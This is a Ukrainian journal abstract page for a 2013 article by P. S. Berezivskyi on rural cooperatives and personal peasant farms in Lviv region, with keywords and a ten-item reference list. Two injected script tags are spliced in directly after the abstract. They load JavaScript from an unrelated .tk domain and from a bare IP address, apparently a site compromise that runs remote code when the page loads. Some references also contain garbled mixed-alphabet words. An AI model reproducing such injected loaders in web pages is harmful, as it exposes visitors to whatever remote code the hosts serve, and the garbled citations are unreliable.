ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 334.7:332.122
Аграрний менеджмент і підприємництво

Потенційні можливості Львівщини у формуванні кооперативів / Березівський П. С. // Економіка АПК. - 2013. - № 4 - С. 70

Узагальнено наукові погляди вчених економістів-аграрників щодо теоретико-методологічних і практичних засад кооперації. Проведено аналіз розвитку особистих селянських господарств у Львівській області, дано оцінку їх розмірів за площею сільськогосподарських угідь і щільністю поголів’я худоби. Запропоновано авторське бачення наукових засад сільської кооперації у пореформений період розвитку сільських територій. Сільську кооперацію розглянуто як спосіб групових дій для досягнення певної мети за умови реалізації міжнародних принципів кооперації на основі історичного світового та вітчизняного досвіду розвитку кооперативного руху. Важливими елементами наукових засад сільської кооперації є виявлення лідера сільської громади і форма реалізації – неприбуткова кооперативна організація. Табл.: 3. Рис.: 1. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: сільська кооперація, пореформений період, особисте селянське господарство, рушійні сили, лідер, форма реалізації, неприбуткова кооперативна організація

Список використаних джерел

  1. Горбонос Ф.В. Кооперація: методологічні і методичні основи /Ф.В. Горбонос. – Львів: Львів. держ. аграрн. ун-т, 2003. – 264 с.
  2. Зіновчук В.В. Організаційні основи сільськогосподарського кооперативу. / В.В. Зіновчук - 2-ге вид., доп. і перероб. – К.: Логос, 2001. – 380 с.
  3. Канінський П.К. Розвиток обслуговуючої кооперації в сільському господарстві України: монографія / П.К. Канінський. В.К. Збарський, В.О. Цимбал. – К.: ННЦ ІАЕ, 2010. – 222 с.
  4. Малік М.Й. Кредитне обслуговування сільськогосподарських кооперативів: монографія / М.Й. Малік, А.С. Кудінов. – К.: ННЦ ІАЕ, 2008. – 166 с.
  5. Сільськогосподарська діяльність господарств населення Львівської області: стат. зб. – Львів: Головне управління статистики у Львівській області, 2011. – 153 с.
  6. Сільськогосподарська кооперація в Галичині: історія, сучасність, перспективи [текст]: наук. - практ. посіб. / Кол. уклад.: М.Д. Костюк, П.М. Музика, А.Я. Доманський, І.Я. Паньків, Д.О. Соломонко; Львів. обл. держ. адміністрація. – Львів: СПОЛОМ, 2012. – 168 с.
  7. Сільське господарство Львівщини: стат. зб. – Львів: Головне управління статистики у Львівській області, 2012. – 172 с.
  8. Barton, David G. “1. What is cooperative? 2. Principles”. Cooperatives in Agriculture. Edited by David Cobia/ Englewood Cliff, New Jersey: Prentice Hall, 1989. – P. 1-34.
  9. Johansson, Tore et al. Farmers’ Cooperation in Sweden: Origin and Development. LTs föцrlag, Stockholm, 1980. – 1440 p.
  10. Münkner, Hans-H. Cooperative Principles and Cooperative Law. 4 th Reprint/ Institut füьr Kooperation in Entwicklungaläдndern, Marburg/Lahn, 1981. – 153 p.
Читати статтю: 13_04_09.pdf